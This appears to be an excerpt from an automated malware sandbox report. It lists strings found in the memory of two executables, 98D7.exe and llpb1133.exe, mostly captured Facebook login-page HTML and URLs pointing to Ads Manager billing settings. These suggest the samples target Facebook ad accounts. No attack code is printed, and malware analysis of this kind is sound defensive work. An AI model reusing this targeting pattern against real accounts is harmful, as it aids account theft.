          Source: 98D7.exe, 00000010.00000003.485706369.00000000004CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "AXiYmP4qFaQHascr1k0","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-xX0","isCQuick":false});</script><script nonce="tcnyEH4i">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="tcnyEH4i"></style><script nonce="tcnyEH4i">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="google" content="notranslate" /><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><link type="text/css" rel="styleshee equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.485706369.00000000004EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: #63WjvmBvstar-mini.c10r.facebook.comwww.facebook.comVcf/+Vt226/Tfv/c0/6XlGQvncBnYIhZfQm7+OMVLOakv6bGNmsWm2WlX8BGIe1tmTItZUHmNoSUEtBlYjjKKdiBcDympESTiMp3g/vFmdLt2Njlufiy+G2fSvJpt5NtRx419dPslV5CO3cc6Nz/HIt1+3SfmbHjBZdK1ytmm0dCckPvQQ3RK3JRwz9Grl4i4AG/I2xT6le5aTRTfIVX2uKzcq7Y+hdMb9qgjqO5bWZHetnvjbdtz6L3329ZuUN/SwvQW90i7rMOKaYwuwGE8ZdbN5RiygzlV2R/yBpBV2ZaltVCvuWptI4zU0EcpICK8IPhHCK0oRCeHVRVMySpMI/5wR4Z9FDKtM1o20/Qcb2C6P8HRVa4H5XjttjTfaeYyoe1One41Vq0fPYwTdk/qCVl45y29Bt+zYR2oO1ozPfvzRxORNbG9HJpT1c8i6h20n6mWGv0aGfeFhcznTXyFTYPS5ZwRexxBVXHIdQxSjuI4hUhW5jqGbrmSkLikIV2Z0RI7tc/vHvvjQOzGy58t4L6+ZOEQW9Cm9pVW0loYbQQwPqFVXLMO6uClkv7cutymKP0fyjaI/WXyjGCBGvlEMlksGyAUHU3zffa/dpHxlI9uDAsv6OMaAh4LOaNaSNVHHf25r620e+2lSXiafwvrHque0FWushDuverG8CK1iS3bVhro66+ZTlAhdSlddpOpPeav+IpXLwcbC9YhgY+HpNNhYtJ5klJ7T7tURostEQAdd1/d3Ld+0G+/R7kxdNCa7aZSvl83RbvaDHuwY/Eqb8WncHJ6uF9tlvCtqvl0dN2tgqOcxSrrUza7vKoH8na50vdKVn3QX1dtdYiigbRDJ67RBtEJPG3TVmOym0XMnDV66p3y+h181ixVb0MUNhU7XagZcT8sXDPt62kAZ3/W0toQSLhHnetpgSc/1tIFM7vW0wSq819OG6kiG6hBxfF3LKWdfU33PF6B6H+xh1xbHZ8baFQO/WJ1Gi8JqiXa6yNUk6Eba0KzIjbShXOJG2nAl5EbaSC3JcC2iFzqvzoX9/pIetr2ozevOB+PjxSOdyL3hUf/VzEhY3NwyWFCe+ulTto/zk6SiUdHde5tmtAXYZu1xKyeYBcX7w8Sf6n4HjXcNhsonQ+S5K8GIUx9/ewGmxE9DtzljWG2t6mxwJ+rjVqMxbYhbHg/Kk+HOCF7k7EyD0EPCObt2rnBRuXOFconOFa6EdK5ILclwLd6Y2vY688PvvmGT8lAP6yedzCo1+QXoM3jKfnGDcdBbX7uUiLyI+RDOJsyHCDXEfIjWk4zQI6/No25I9nf8KwzMP+5hB2c0o2o29UpRL7dhB7mCm/UFcae2PUhFBJyLq8G0twb3KLu9OZPsJm91twf1uUhOVNbfRdlJ9y4vqMqu2pLR2uRwx51Ionwv/e0E21IsQ/mrs3X32pqLq7kbvDW3VfFnMZl178aGLudNRaH+AKEhdyuCHSxI equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.0000000000489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.com equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.00000000004E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.com' equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.602257740.00000000004F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.com85fCl5 equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.602257740.00000000004CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.comBPxf9szi equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.602257740.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.comF5Ljz7 equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.00000000004E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.comP equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.00000000004E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.com\ equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.comtey.com equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: )</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fzh-cn.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fmanager%252Faccount_settings%252Faccount_billing&amp;source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_h4Swrc8tiWJ sx_8ed39e"></i></a></li></ul><div id="contentCurve"></div><div id="pageFooterChildren" role="contentinfo" aria-label="Facebook site links"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="/reg/" title="Sign Up for Facebook">Sign Up</a></li><li><a href="/login/" title="Log into Facebook">Log In</a></li><li><a href="https://messenger.com/" title="Check out Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Browse our Watch videos.">Watch</a></li><li><a href="/places/" title="Check out popular places on Facebook.">Places</a></li><li><a href="/games/" title="Check out Facebook games.">Games</a></li><li><a href="/marketplace/" title="Buy and sell on Facebook Marketplace.">Marketplace</a></li><li><a href="https://pay.facebook.com/" title="Learn more about Meta Pay" target="_blank">Meta Pay</a></li><li><a href="https://www.oculus.com/" title="Learn more about Oculus" target="_blank">Oculus</a></li><li><a href="https://portal.facebook.com/" title="Learn more about Facebook Portal" target="_blank">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT33nT0av14-OdCHPSBrmN7vWoi_N58qoOyFxP9hxRxhkYZWAsqrYtRQKSZkjXicDAN0rsfh_ncZ6C7b0pQeIWPfdIA5WlCAuouNjLvOMIXOLTMLxJamyk7gEFY1PtSDmz1xbLox7hwsOPFgyN5QVw" title="Check out Instagram" target="_blank" rel="nofollow" data-lynx-mode="asynclazy">Instagram</a></li><li><a href="https://www.bulletin.com/" title="Check out Bulletin Newsletter">Bulletin</a></li><li><a href="/fundraisers/" title="Donate to worthy causes.">Fundraisers</a></li><li><a href="/biz/directory/" title="Browse our Facebook Services directory.">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Information Center.">Voting Information Center</a></li><li><a href="/privacy/policy/?entry_point=facebook_page_footer" title="Learn how we collect, use and share information to support Facebook.">Privacy Policy</a></li><li><a href="/privacy/center/?entry_point=facebook_page_footer" title="Learn how to manage and control your privacy on Facebook.">Privacy Center</a></li><li><a href="/groups/explore/" title="Explore our Groups.">Groups</a></li><li><a href="https://about.meta.com/" accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">About</a></li><li><a href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto" title="Advertise on Facebook.">Create Ad</a></li><li><a
          Source: llpb1133.exe, 00000014.00000002.602167234.00000000004A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ,[],{sampling_rate:0},423]],require:[["NavigationMetrics","setPage",[],[{page:"/login.php",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:"7197487241275804713"}]],["FalcoLoggerTransports","attach",[],[]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["NavigationClickPointHandler"],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster","schedule",[],[]],["Artillery","disable",[],[]],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","g5ziY9wIl3trqyKMAcJWVuY9",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","g5ziY8MhThgrxFTRnRYf0yiq",63072000000,"/",false,false,true]]]},hsrp:{hsdp:{clpData:{"1871697":{r:1,s:1},"1829319":{r:1},"1829320":{r:1},"1843988":{r:1}}},hblp:{consistency:{rev:1006922962},compMap:{TransportSelectingClientSingleton:{r:["Jg4hod5","3zhsDmU","Yv2Rq7N"],rds:{m:["ContextualConfig","BladeRunnerClient","DGWRequestStreamClient","MqttLongPollingRunner","BanzaiScuba_DEPRECATED"],r:["c6kpRKc","9Zir1u8","sqCOqNp","HN4gUih","foz7nw7","msMcd10","TjYa5zM","5p9Jgd9","Ajrp3n3","CUpDMe1"]},be:1},RequestStreamCommonRequestStreamCommonTypes:{r:["Jg4hod5"],be:1}}}},allResources:["c6kpRKc","sqCOqNp","GpQFBwL","TjYa5zM","foz7nw7","CUpDMe1","msMcd10","BnbajS7","HN4gUih","Da6rL6k"]});}));</script></body></html> equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.0000000000489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .Rwww.facebook.com/ads/manager/account_settings/account_billingE51FFCD991E7 equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.605295836.00000000028BA000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.482623800.0000000000558000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.604870150.000000000289F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing0`J equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingemRHRnNiQ0k2SUNJd0lpd2dJbTFoWXlJNklDSTVNemRtT0RVMU1EbjA9K equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.485706369.00000000004CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 801],[30005,838801],[30006,573585],[30007,838801],[30008,838801],[30012,838801],[30013,838801],[30015,806033],[30018,806033],[30021,540823],[30022,540817],[30040,806033],[30093,806033],[30094,806033],[30095,806033],[30101,541591],[30102,541591],[30103,541591],[30104,541591],[30106,806039],[30107,806039],[38000,541427],[38001,806643]]}",fds:60,fda:60,i:60,sbs:1,dbs:100,bbs:100,hbi:60,rt:262144,hbcbc:2,hbvbc:0,hbbi:30,sid:-1,hbv:"8512997887222069599"}]],["NavigationMetrics","setPage",[],[{page:"XWebLoginController",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:"7197487022966541601"}]],["FalcoLoggerTransports","attach",[],[]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["NavigationClickPointHandler"],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster","schedule",[],[]],["Artillery","disable",[],[]],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","UJziYyYI8MDeJZgXiXCkQ3-E",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","UJziYxwlxqEat5iGTuvcAVAe",63072000000,"/",false,false,true]]]},hsrp:{hsdp:{clpData:{"1743095":{r:1,s:1},"1871697":{r:1,s:1},"1829319":{r:1},"1829320":{r:1},"1843988":{r:1}},gkxData:{"1652843":{result:false,hash:"AT6uh9NWRY4QEQoYoPI"}}},hblp:{consistency:{rev:1006922962},rsrcMap:{zPYlTyl:{type:"js",src:" equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: </a></li><li><a class="_sv4" dir="ltr" href="https://hi-in.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;hi_IN&quot;, &quot;en_US&quot;, &quot;https:\/\/hi-in.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 8); return false;" title="Hindi"> equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: </a></li><li><a class="_sv4" dir="ltr" href="https://zh-cn.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;zh_CN&quot;, &quot;en_US&quot;, &quot;https:\/\/zh-cn.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 9); return false;" title="Simplified Chinese (China)"> equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.00000000004A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="0UjEcK6d">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascr6oI","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-U40","isCQuick":false});</script><script nonce="0UjEcK6d">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="0UjEcK6d"></style><script nonce="0UjEcK6d">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="https://www.facebook.com/ equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.604851431.0000000002865000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="0UjEcK6d">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascr6oI","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-U40","isCQuick":false});</script><script nonce="0UjEcK6d">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="0UjEcK6d"></style><script nonce="0UjEcK6d">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="https://www.facebook.com/login/" /><meta property="og:title" content="Log in or sign up to view" /><meta property="og:description" content="See posts, photos and more on Facebook." /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0,cross/RspwE1UYLwr.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="Pud6B2Z" /> equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="I8ayIX6p">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrCKU","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-7Nc","isCQuick":false});</script><script nonce="I8ayIX6p">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="I8ayIX6p"></style><script nonce="I8ayIX6p">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2FaK equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="I8ayIX6p">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrCKU","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-7Nc","isCQuick":false});</script><script nonce="I8ayIX6p">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="I8ayIX6p"></style><script nonce="I8ayIX6p">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2FaK equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.00000000004A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="I8ayIX6p">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrCKU","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-7Nc","isCQuick":false});</script><script nonce="I8ayIX6p">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="I8ayIX6p"></style><script nonce="I8ayIX6p">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="h_0_0_DM",{"__html":"Bahasa Indonesia"},1],["__markup_3310c079_0_1_eM",{"__html":"Dansk"},1],["__markup_3310c079_0_2_2L",{"__html":"Deutsch"},1],["__markup_3310c079_0_3_ft",{"__html":"English (UK)"},1],["__markup_3310c079_0_4_y0",{"__html":"English (US)"},1],["__markup_3310c079_0_5_l6",{"__html":"Espa\u00f1ol"},1],["__markup_3310c079_0_6_tR",{"__html":"Espa\u00f1ol (Espa\u00f1a)"},1],["__markup_3310c079_0_7_Y1",{"__html":"Fran\u00e7ais (France)"},1],["__markup_3310c079_0_8_5+",{"__html":"Italiano"},1],["__markup_3310c079_0_9_eb",{"__html":"Magyar"},1],["__markup_3310c079_0_a_5j",{"__ht equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="I8ayIX6p">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrCKU","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-7Nc","isCQuick":false});</script><script nonce="I8ayIX6p">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="I8ayIX6p"></style><script nonce="I8ayIX6p">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="https://www.facebook.com/login/" /><meta property="og:title" content="Log in or sign up to view" /><meta property="og:description" content="See posts, photos and more on Facebook." /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rs equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="I8ayIX6p">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrCKU","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-7Nc","isCQuick":false});</script><script nonce="I8ayIX6p">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="I8ayIX6p"></style><script nonce="I8ayIX6p">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="https://www.facebook.com/login/" /><meta property="og:title" content="Log in or sign up to view" /><meta property="og:description" content="See posts, photos and more on Facebook." /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsoJ equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="I8ayIX6p">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrCKU","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-7Nc","isCQuick":false});</script><script nonce="I8ayIX6p">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="I8ayIX6p"></style><script nonce="I8ayIX6p">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="https://www.facebook.com/login/" /><meta property="og:title" content="Log in or sign up to view" /><meta property="og:description" content="See posts, photos and more on Facebook." /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0,cross/RspwE1UYLwr.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="Pud6B2Z" /> equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.605295836.00000000028BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="btvDfB12">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrsdc","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-Erw","isCQuick":false});</script><script nonce="btvDfB12">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="btvDfB12"></style><script 